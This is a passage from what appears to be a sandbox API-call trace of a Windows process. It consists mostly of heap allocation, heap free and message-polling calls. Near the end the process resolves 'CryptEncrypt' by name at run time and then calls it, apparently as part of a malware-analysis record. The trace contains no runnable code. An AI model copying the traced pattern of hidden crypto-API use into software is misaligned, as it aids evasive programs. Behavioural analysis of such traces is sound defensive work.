0x2aaa360 [0122.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0122.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0122.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0122.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0122.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0122.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0122.930] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0122.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0122.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0122.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0122.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0122.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0122.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0122.930] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0122.930] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0122.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0122.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0122.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0122.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0122.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0122.930] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4c8 [0122.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0122.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0122.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0122.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0122.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0122.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0122.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74748 | out: hHeap=0x2af0000) returned 1 [0122.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0122.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0122.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0122.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0122.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0122.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0122.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0122.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0122.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0122.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0122.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0122.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0122.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0122.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0122.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0122.931] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0122.931] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0122.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0122.931] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0122.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0122.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0122.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa300 [0122.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73a10 [0122.931] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0122.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0122.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0122.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0122.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0122.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0122.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0122.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0122.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0122.932] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0122.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0122.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0122.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0122.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0122.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0122.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0122.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0122.932] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0122.932] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0122.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0122.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa270 [0122.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0122.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0122.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0122.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0122.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0122.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0122.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0122.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0122.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0122.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0122.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0122.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0122.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0122.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0122.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0122.933] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0122.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73a10 | out: hHeap=0x2af0000) returned 1 [0122.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0122.933] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0122.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0122.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0122.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0122.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.933] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0122.933] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0122.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0122.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0122.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0122.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0122.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0122.933] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0122.934] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0122.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0122.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0122.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0122.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0122.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0122.934] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0122.934] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0122.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa3d8 [0122.934] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0122.934] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.935] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0122.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0122.935] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0122.935] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0122.936] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0122.936] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0122.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a95438 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0122.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0122.938] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0122.938] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0122.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa2d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.939] CryptEncrypt (in: hKey=0x9a47c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x5974, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x5978) returned 1 [0122.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0122.939] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 